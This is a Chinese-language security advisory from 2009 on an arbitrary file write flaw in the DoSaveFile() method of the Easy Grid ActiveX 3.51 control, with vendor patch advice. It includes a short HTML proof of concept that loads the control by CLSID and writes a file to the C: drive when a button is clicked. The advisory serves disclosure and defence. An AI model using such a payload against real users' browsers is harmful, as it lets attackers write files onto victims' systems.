发布日期：2009-01-14
更新日期：2009-01-16

受影响系统：

Easy Grid Control Team Easy Grid ActiveX 3.51

描述：

---

BUGTRAQ  ID: 33272

Easy Grid ActiveX控件是用于打印、预览表格、图标、公式、表达式的工具。

EasyGrid.SGCtrl.32 ActiveX控件（EasyGrid.ocx）没有安全地调用DoSaveFile()方式，如果用户受骗访问了恶意网页并向该方式传送了特制参数的话，就会导致向用户系统写入任意文件。

<*来源：Houssamix
  
  链接：http://secunia.com/advisories/33537/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<HTML>
<BODY>
<object id=hsmx classid="clsid:{DD44C0EA-B2CF-31D1-8DD3-444553540000}"></object>

<SCRIPT>

function hehe()
{
     File = "c:\\hsmx.txt"
   hsmx.DoSaveFile(File)
}

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

建议：

---

厂商补丁：

Easy Grid Control Team
----------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.share2.com/easygrid/download.htm

浏览次数：2676
严重程度：0（网友投票）